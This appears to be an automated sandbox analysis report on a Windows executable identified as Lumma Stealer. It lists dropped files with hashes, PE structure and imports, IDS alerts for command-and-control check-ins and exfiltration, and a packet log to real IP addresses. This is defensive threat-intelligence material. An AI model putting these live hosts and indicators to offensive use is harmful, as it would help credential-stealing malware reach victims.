Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC992.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4714
Entropy (8bit):	4.477839575040275
Encrypted:	false
SSDEEP:	48:cvIwWl8zsWJg77aI9UPWpW8VYiYm8M4JlKoCO3Fn1+q8vNKoCO/3JzteTd:uIjfsI7ee7VyJzCM1K7CG3JztGd
MD5:	1093C0BA7098C5A82F9CD0C2B57A620D
SHA1:	A4487D3068AA4602B369EB401970BA0585EE377B
SHA-256:	7B83211A763CBB3518EE562318786A40CBCD46955E23B62EF349802F1CB908D6
SHA-512:	19D343223594769E091F6B16368119B51BA454CFFE56D1B233789BC9AE844FBAC0A7BD1F41EB301F6A13D0BF8CEDBE1301E5CC9CD5D96B233DE95C26CBE5B513
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="637152" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\TUp6f2knn2.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	368128
Entropy (8bit):	6.68436511005947
Encrypted:	false
SSDEEP:	6144:+3UTQTn7pm2PUwOIvILi6xeyyFz8iO5TwdZ1:+3kQTn1DPwGhyyFz8iowL1
MD5:	9026F04B1266851659FB62C91BD7F2F3
SHA1:	917DA549856FD1CB8876D6AA97F204F46E42A2FE
SHA-256:	174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
SHA-512:	B10108A3BCE0D25551E4442BC3E97B61DC84AD58E3DF821792534EB56BEE9E36ADD44984C6C22902098E439413B9C838CC40D9D0E29F3A934DC37BD866D4D38B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Joe Sandbox View:	Filename: sqJIHyPqhr.exe, Detection: malicious, Browse Filename: InstallSetup.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#.....6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L...Xg_e.....................*?...................@..........................0C..............................................(..<.....B..............................................................................................................text............................... ..`.rdata...!......."..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Download File

Process:	C:\Users\user\Desktop\TUp6f2knn2.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	368128
Entropy (8bit):	6.68436511005947
Encrypted:	false
SSDEEP:	6144:+3UTQTn7pm2PUwOIvILi6xeyyFz8iO5TwdZ1:+3kQTn1DPwGhyyFz8iowL1
MD5:	9026F04B1266851659FB62C91BD7F2F3
SHA1:	917DA549856FD1CB8876D6AA97F204F46E42A2FE
SHA-256:	174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
SHA-512:	B10108A3BCE0D25551E4442BC3E97B61DC84AD58E3DF821792534EB56BEE9E36ADD44984C6C22902098E439413B9C838CC40D9D0E29F3A934DC37BD866D4D38B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Joe Sandbox View:	Filename: sqJIHyPqhr.exe, Detection: malicious, Browse Filename: InstallSetup.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#.....6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L...Xg_e.....................*?...................@..........................0C..............................................(..<.....B..............................................................................................................text............................... ..`.rdata...!......."..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4654729317063255
Encrypted:	false
SSDEEP:	6144:fIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNpdwBCswSbYk:QXD94+WlLZMM6YFHD+Yk
MD5:	565EAB3F21D85D0B3B927EB290419A1B
SHA1:	2CF667B8EEC730DFAECE2A57196F362FC9B6F3E1
SHA-256:	E15CC934EFFE0BD3314960BE13A4C52741F23BD5C64AE87012CAB7DDED780354
SHA-512:	8EDEF279786D40E75CB375A2FC88708222D89872F37DAF142A72E2DFD0097A2A3EC27ED93A66462D906811E735435E31E777163FE32D56603A68A4CE89DFC1BC
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....Q...............................................................................................................................................................................................................................................................................................................................................0..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.024806521400004
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TUp6f2knn2.exe
File size:	435'712 bytes
MD5:	a4f21b597fb56b09132987c396b7acc2
SHA1:	5ac95809ec82f0cdb3612ad1c1bbdd85196273b8
SHA256:	309bb2b85b8789299d9cc64934970b6010956a208de3ed9b853578ae8a15810b
SHA512:	9d1c3f9294a677f5b1f363197acba4749d482d62403942c9e1d71af74216e193ba5be394ef3b3bcf52084e075553c1a4b3a886d15eec5a3a5ce1c4d0ee2779e3
SSDEEP:	6144:ww1ETf6IduRVIwN2dJ4eomHESrwf9D5zdljYUPBby9fe0C1jnfEMTRqTwdWRf:ww1mcywPmkR9D5zz3NSfeNREMdqwYRf
TLSH:	6994E111B6F5A622F3B38A347935D7942A3FF5339E35A14E2298166F0E713D18E62703
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L..

File Icon


Icon Hash:	46c7c30b0f4e0d59

Static PE Info

General

Entrypoint:	0x401877
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64C0A4AB [Wed Jul 26 04:44:27 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	f9df41ae4b2e96d07a46131787a7a3b9

Entrypoint Preview

Instruction
call 00007EFEB12BD79Bh
jmp 00007EFEB12B9E1Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00456C38h], eax
mov dword ptr [00456C34h], ecx
mov dword ptr [00456C30h], edx
mov dword ptr [00456C2Ch], ebx
mov dword ptr [00456C28h], esi
mov dword ptr [00456C24h], edi
mov word ptr [00456C50h], ss
mov word ptr [00456C44h], cs
mov word ptr [00456C20h], ds
mov word ptr [00456C1Ch], es
mov word ptr [00456C18h], fs
mov word ptr [00456C14h], gs
pushfd
pop dword ptr [00456C48h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00456C3Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00456C40h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00456C4Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00456B88h], 00010001h
mov eax, dword ptr [00456C40h]
mov dword ptr [00456B3Ch], eax
mov dword ptr [00456B30h], C0000409h
mov dword ptr [00456B34h], 00000001h
mov eax, dword ptr [00454004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00454008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C8h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x529fc	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x431000	0x10ca8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x52558	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x51000	0x194	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4fe3c	0x50000	3df9361b938f46512c0e937a996cae0f	False	0.8432525634765625	data	7.542707569113861	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x51000	0x230e	0x2400	960f4107a2c4bb2cead1631588f32da1	False	0.3597005208333333	data	5.4361154542112144	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x54000	0x3dc4bc	0x7000	e20cad3d0b8c718a48e44ad11e1f7b9f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x431000	0x10ca8	0x10e00	09870799e5fc231d39e3e8240f6e44f2	False	0.5897280092592593	data	5.806153283413415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4315b0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.5101279317697228
RT_ICON	0x432458	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.5658844765342961
RT_ICON	0x432d00	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.6002304147465438
RT_ICON	0x4333c8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.6394508670520231
RT_ICON	0x433930	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.4099585062240664
RT_ICON	0x435ed8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.4793621013133208
RT_ICON	0x436f80	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.47704918032786886
RT_ICON	0x437908	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.5806737588652482
RT_ICON	0x437de8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.7985074626865671
RT_ICON	0x438c90	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.8267148014440433
RT_ICON	0x439538	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.8047235023041475
RT_ICON	0x439c00	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.8395953757225434
RT_ICON	0x43a168	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.803941908713693
RT_ICON	0x43c710	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.8334896810506567
RT_ICON	0x43d7b8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.8454918032786886
RT_ICON	0x43e140	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.8643617021276596
RT_STRING	0x43e7d8	0x386	data			0.4567627494456763
RT_STRING	0x43eb60	0xb2	data			0.601123595505618
RT_STRING	0x43ec18	0x6d0	data			0.4288990825688073
RT_STRING	0x43f2e8	0x71e	data			0.4313940724478595
RT_STRING	0x43fa08	0x6e2	data			0.43473325766174803
RT_STRING	0x4400f0	0x65c	data			0.43611793611793614
RT_STRING	0x440750	0x71a	data			0.4251925192519252
RT_STRING	0x440e70	0x7c4	data			0.4200201207243461
RT_STRING	0x441638	0x66a	data			0.43118148599269185
RT_GROUP_ICON	0x43e5a8	0x76	data	Turkmen	Turkmenistan	0.6694915254237288
RT_GROUP_ICON	0x437d70	0x76	data	Turkmen	Turkmenistan	0.6610169491525424
RT_VERSION	0x43e620	0x1b4	data			0.5688073394495413

Imports

DLL

Import

KERNEL32.dll

GetFileSize, SearchPathW, SetLocaleInfoA, InterlockedIncrement, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, ReadConsoleOutputAttribute, GetEnvironmentStringsW, Process32First, SetComputerNameW, GetTimeFormatA, SetEvent, GetProcessPriorityBoost, GetModuleHandleW, GetCommandLineA, GetEnvironmentStrings, LoadLibraryW, ReadProcessMemory, DeleteVolumeMountPointW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, LocalAlloc, AddAtomW, FoldStringA, CreatePipe, GetModuleHandleA, UpdateResourceW, OpenFileMappingW, GetShortPathNameW, FindFirstVolumeA, GetVersionExA, UnregisterWaitEx, SetFileAttributesW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, HeapAlloc, MultiByteToWideChar, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP

USER32.dll

GetProcessDefaultLayout

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkmen	Turkmenistan

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T21:09:50.794243+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	172.67.179.207	443	TCP
2024-12-18T21:09:52.352523+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49731	176.113.115.19	80	TCP
2024-12-18T21:09:55.352230+0100	2058374	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)	1	192.168.2.4	50223	1.1.1.1	53	UDP
2024-12-18T21:09:56.725004+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.4	49732	104.21.24.223	443	TCP
2024-12-18T21:09:56.725004+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.24.223	443	TCP
2024-12-18T21:09:57.439274+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	104.21.24.223	443	TCP
2024-12-18T21:09:57.439274+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.24.223	443	TCP
2024-12-18T21:09:58.668650+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.4	49733	104.21.24.223	443	TCP
2024-12-18T21:09:58.668650+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.24.223	443	TCP
2024-12-18T21:09:59.595961+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49733	104.21.24.223	443	TCP
2024-12-18T21:09:59.595961+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	104.21.24.223	443	TCP
2024-12-18T21:10:01.401906+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.4	49734	104.21.24.223	443	TCP
2024-12-18T21:10:01.401906+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.24.223	443	TCP
2024-12-18T21:10:02.320402+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49734	104.21.24.223	443	TCP
2024-12-18T21:10:03.816941+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.4	49735	104.21.24.223	443	TCP
2024-12-18T21:10:03.816941+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.24.223	443	TCP
2024-12-18T21:10:06.504622+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.4	49738	104.21.24.223	443	TCP
2024-12-18T21:10:06.504622+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.24.223	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 21:09:48.475208044 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:48.475251913 CET	443	49730	172.67.179.207	192.168.2.4
Dec 18, 2024 21:09:48.475317001 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:48.713255882 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:48.713282108 CET	443	49730	172.67.179.207	192.168.2.4
Dec 18, 2024 21:09:50.151639938 CET	443	49730	172.67.179.207	192.168.2.4
Dec 18, 2024 21:09:50.151803970 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:50.251950026 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:50.251981974 CET	443	49730	172.67.179.207	192.168.2.4
Dec 18, 2024 21:09:50.252353907 CET	443	49730	172.67.179.207	192.168.2.4
Dec 18, 2024 21:09:50.252432108 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:50.271987915 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:50.315335989 CET	443	49730	172.67.179.207	192.168.2.4
Dec 18, 2024 21:09:50.794260979 CET	443	49730	172.67.179.207	192.168.2.4
Dec 18, 2024 21:09:50.794358969 CET	443	49730	172.67.179.207	192.168.2.4
Dec 18, 2024 21:09:50.794400930 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:50.794421911 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:50.796309948 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:50.796329975 CET	443	49730	172.67.179.207	192.168.2.4
Dec 18, 2024 21:09:50.796370983 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:50.796391964 CET	49730	443	192.168.2.4	172.67.179.207
Dec 18, 2024 21:09:50.904990911 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:51.024854898 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:51.025058985 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:51.025125980 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:51.144682884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.352416992 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.352523088 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.352525949 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.352564096 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.352607012 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.352607012 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.352878094 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.353080034 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.353107929 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.353144884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.353183985 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.353183985 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.353562117 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.353596926 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.353631973 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.353653908 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.353667021 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.353683949 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.353754997 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.473370075 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.473433971 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.473531008 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.473531008 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.477571011 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.477647066 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.544059038 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.544091940 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.544148922 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.544178009 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.546657085 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.546705008 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.546751976 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.546751976 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.554920912 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.554982901 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.555052996 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.555052996 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.561414003 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.561491966 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.561505079 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.561754942 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.569865942 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.569935083 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.569977045 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.569977045 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.578195095 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.578268051 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.578311920 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.578311920 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.586553097 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.586719990 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.586743116 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.587017059 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.594970942 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.595048904 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.595086098 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.595136881 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.603288889 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.603382111 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.603395939 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.603463888 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.612171888 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.612337112 CET	80	49731	176.113.115.19	192.168.2.4
